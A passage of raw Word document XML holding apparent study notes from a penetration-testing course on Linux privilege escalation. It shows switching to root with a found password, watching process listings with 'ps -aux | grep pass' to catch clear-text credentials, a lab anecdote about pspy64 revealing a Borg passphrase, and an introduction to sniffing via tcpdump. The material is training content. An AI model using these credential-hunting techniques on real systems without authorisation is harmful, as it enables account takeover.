      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's first try to escalate our privileges by directly typing the newly-discovered password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4997437" cy="1473603"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="396" name="image376.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image376.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId918"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4997437" cy="1473603"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su - root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ switch to root but keep your current environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switches to the root user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">without</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> simulating a full login</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keeps most of your current environment variables (including potentially insecure ones).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keeps your current working directory (e.g., /home/joe).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reads root’s .bashrc (if the shell is interactive), not .bash_profile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su - root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ switch to root and make it as if root just logged in fresh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switches to the root user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a login shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resets the environment to what root would normally get at login (safer, more predictable).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reads root’s login shell files like .bash_profile (and indirectly .bashrc).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B4D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B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4F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fkka1d9spoj0" w:id="381"/>
      <w:bookmarkEnd w:id="381"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Service footprint enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another helpful example of this was when we ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy64 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">machine 172.16.xxx.19, and saw the Borg process PASSPHRASE that it used to authenticate. So, since it left that footprint, we were able to exploit and use Borg. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B52">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B54">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 18.2.2. Inspecting Service Footprints</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B56">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System</w:t>
      </w:r>
      <w:hyperlink r:id="rId919">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId920">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">daemons</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are Linux services that are spawned at boot time to perform specific operations without any need for user interaction. Linux servers are often configured to host numerous daemons, like SSH, web servers, and databases, to mention a few.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B57">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System administrators often rely on custom daemons to execute ad-hoc tasks, and they sometimes neglect security best practices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B58">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As part of our enumeration efforts, we should inspect the behavior of running processes to hunt for any anomaly that might lead to an elevation of privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B59">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike on Windows systems, on Linux we can list information about higher-privilege processes such as the ones running inside the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can enumerate all the running processes with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command and since it only takes a single snapshot of the active processes, we can refresh it using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">watch</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. In the following example, we will run the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command every second via the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">watch</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the results on any occurrence of the word "pass".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2133600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="117" name="image113.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image113.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId921"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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2B5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">watch -n 1 "ps -aux | grep pass"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B5E">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In Listing 33, we notice the administrator has configured a system daemon that is connecting to the local system with eve's credentials in clear text. Most importantly, the fact that the process is running as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not prevent us from inspecting its activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B5F">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B60">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B61">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B62">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another more holistic angle we should take into consideration when enumerating for privilege escalation is to verify whether we have rights to capture network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B63">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the de facto command line standard for packet capture, and it requires administrative access since it operates on raw sockets. However, it's not uncommon to find IT personnel accounts have been given exclusive access to this tool for troubleshooting purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B64">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To illustrate the concept, we can run tcpdump as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">joe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user who has been granted specific sudo permissions to run it.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B65">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B66">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
